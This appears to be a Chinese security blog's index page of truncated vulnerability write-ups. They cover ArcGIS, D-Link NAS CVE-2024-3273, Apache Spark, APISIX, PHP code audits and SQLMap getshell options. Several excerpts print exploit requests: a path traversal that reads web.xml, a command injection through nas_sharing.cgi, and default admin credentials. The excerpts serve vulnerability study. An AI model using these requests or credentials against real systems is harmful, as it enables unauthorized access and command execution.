X1ly?S

简介ArcGIS 是由 Esri（Environmental Systems Research Institute）开发的地理信息系统（GIS）软件系列，广泛应用于地图制作、空间分析、数据管理和可视化等领域。ArcGIS 提供了一套完整的工具，帮助用户收集、管理、分析和展示地理信息。 默认信息 端口：6080 后台地址：/arcgis/admin/ 后台密码：siteadmin/siteadmin 漏洞任意文件读取1234567GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.0Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept:...

简介D-Link NAS（网络附加存储）设备为家庭和小型企业提供了一种便捷的数据存储和共享解决方案 数据存储与备份：支持大容量硬盘，提供集中存储和自动备份功能。 文件共享：支持SMB/CIFS、NFS、FTP等协议，方便多用户访问。 远程访问：通过D-Link的mydlink服务，用户可远程访问和管理NAS数据。 多媒体支持：内置DLNA和UPnP AV媒体服务器，支持流媒体播放。 数据安全：支持RAID、密码保护和加密技术，确保数据安全。 漏洞CVE-2024-3273远程命令执行 fofa指纹：_fid=”hWN+yVVhLzKJaLkd/ITHpA==” payload：system={{base64_enc(cmd)}} 123456GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1Host: x.x.x.xUser-Agent:...

Apache-Spark未授权访问漏洞简介Apache Spark 是一个开源的统一分析引擎，旨在大规模数据处理和高速计算。它最初由加州大学伯克利分校的 AMPLab 开发，并于2010年开源，随后在2013年进入Apache软件基金会孵化器，并在2014年成为顶级项目。Spark 以其在内存中处理数据的能力而闻名，可以大幅提高大数据分析的速度和效率。 漏洞原理Apache Spark 未授权访问漏洞主要是由于 Spark 的默认配置或不安全配置导致未经授权的用户能够访问 Spark 的 Web UI 和 REST...

审计过程 首先来到⽂件 app\system\user\admin\parameter.class.php 下的 doDelParas 方法 123456789101112131415161718192021public function doDelParas(){ global $_M; if (!isset($_M['form']['id'])) { $this->error(); } $data = $_M['form']['id']; $module = $this->module; foreach ($data as $value) { if (!$value) { continue; } $this->database->del_by_id($value); ...

strpos1strpos(string $haystack, string $needle, int $offset = 0): int|false 参数 haystack 在该字符串中进行查找。 needle 要搜索的字符串。 offset 如果提供了此参数，搜索会从字符串该字符数的起始位置开始统计。 如果是负数，搜索会从字符串结尾指定字符数开始。 返回值返回 needle 存在于 haystack 字符串起始的位置(独立于 offset)。 同时注意字符串位置是从0开始，而不是从1开始的。如果没找到 needle，将返回 false。 警告 此函数可能返回布尔值 false，但也可能返回等同于 false 的非布尔值。应使用 [=== 运算符]来测试此函数的返回值。 Demo分析 很简单的例子。本次漏洞是开发者对 strpos...

《无尽终章》 当BurpSuite被抛弃于回收站，SQLMap被渗透遗忘。当IPv6同水一起枯竭，HTTP 9和星际飞船我无法想象。若Github还有一息尚存，我的博客将沦为古老的笑话。当师傅的徒弟的徒弟成为师傅死去，思维Fuzz于宇宙，cmd一般漆黑沉默，而我的尸体，又反复腐烂于哪段虚拟的时光?

class-exists1class_exists(string $class, bool $autoload = true): bool $class 为类的名字，在匹配的时候不区分大小写。默认情况下 $autoload 为 true ，当 $autoload 为 true 时，会自动加载本程序中的 __autoload 函数；当 $autoload 为 false 时，则不调用 __autoload 函数。 也就是说class_exists接收的第一个参数class，在默认$autoload为true时，会自动传递给__autoload 函数加载 参数 class 类名。名称以不区分大小写的方式匹配 autoload 如果尚未加载，是否自动加载 返回值如果 class 是已经定义的类，则返回 **true**，否则返回 false 示例1234567<?php// 在尝试使用前检查类是否存在if (class_exists('MyClass')) { $myclass = new...

...

本文没什么技术含量，Nday会打就行，于是直接照抄vulhub了 简介APIsix 是一个高性能、开源的云原生 API 网关，广泛应用于微服务架构中，它能够处理 API 请求并提供各种 API 管理功能，如负载均衡、API 认证、路由、限流、监控、日志记录等。APIsix 设计上考虑了云原生环境，支持高度的可扩展性、可配置性和插件化，能够无缝集成到容器化和 Kubernetes 环境中。 典型应用场景 微服务架构：在微服务环境中，APIsix 可作为前端 API 网关，负责流量控制、负载均衡、认证授权等功能。 多协议支持：适用于需要支持多种协议（如 HTTP、WebSocket、gRPC）的应用场景。 高可用架构：通过支持高并发和高性能，APIsix 可以在高可用的架构中，提供流量分发和服务治理的功能。 核心组件 APIsix Gateway：处理实际的请求流，执行路由、负载均衡、插件逻辑等。 Admin API：提供用于管理和配置网关的接口，通常用于动态更新路由规则、插件配置等。 ETCD：APIsix 使用 Etcd...

发篇库存，归档整理一下前朝老笔记 SQLMap里getshell的几个参数–os-shell这个参数对于MySQL来说其实就是利用into outfile写入一个webshell，于是需要有足够的写入权限，已知绝对路径的前提条件，对于MSSQL来说，是通过xp_cmdshell等组件直接执行的系统命令，二者是有区别的，前者使用webshell做了一个跳板，后者是直接执行命令的。如果mysql也想实现直接执行系统命令的效果，则需要借助UDF相关的姿势 参数 内容 前提条件 - 目标存在 SQL 注入漏洞。 - 数据库用户权限足够高，允许执行操作系统命令（如调用 xp_cmdshell、sys_exec）。 - 需要知道网站的绝对路径（如 /var/www/html）来上传 WebShell。 原理 SQLMap...